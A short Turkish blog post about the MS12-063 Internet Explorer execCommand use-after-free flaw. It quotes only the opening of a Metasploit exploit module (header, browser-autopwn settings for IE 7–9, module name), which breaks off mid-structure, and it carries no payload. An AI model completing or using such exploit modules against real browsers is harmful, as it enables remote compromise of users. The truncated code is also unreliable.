MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free açığı
Açıkla remote uzaktan internet explorer kötü niyetli olarak kullanılabilmekte.

Code: tamamı kopyalanamamış olup, microsoft security essentials müdahale etmekte ve yutmaktadır. Demekki bu açığa ilişkin güvenlik önlemi Microsoft tarafından tüm bilgisayarlara güncellenmiş.


##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML


  include Msf::Exploit::RopDb

  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({

    :ua_minver => "7.0",

    :ua_maxver => "9.0",

    :rank    => GoodRanking

  def initialize(info={})


    super(update_info(info,


      'Name'      => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir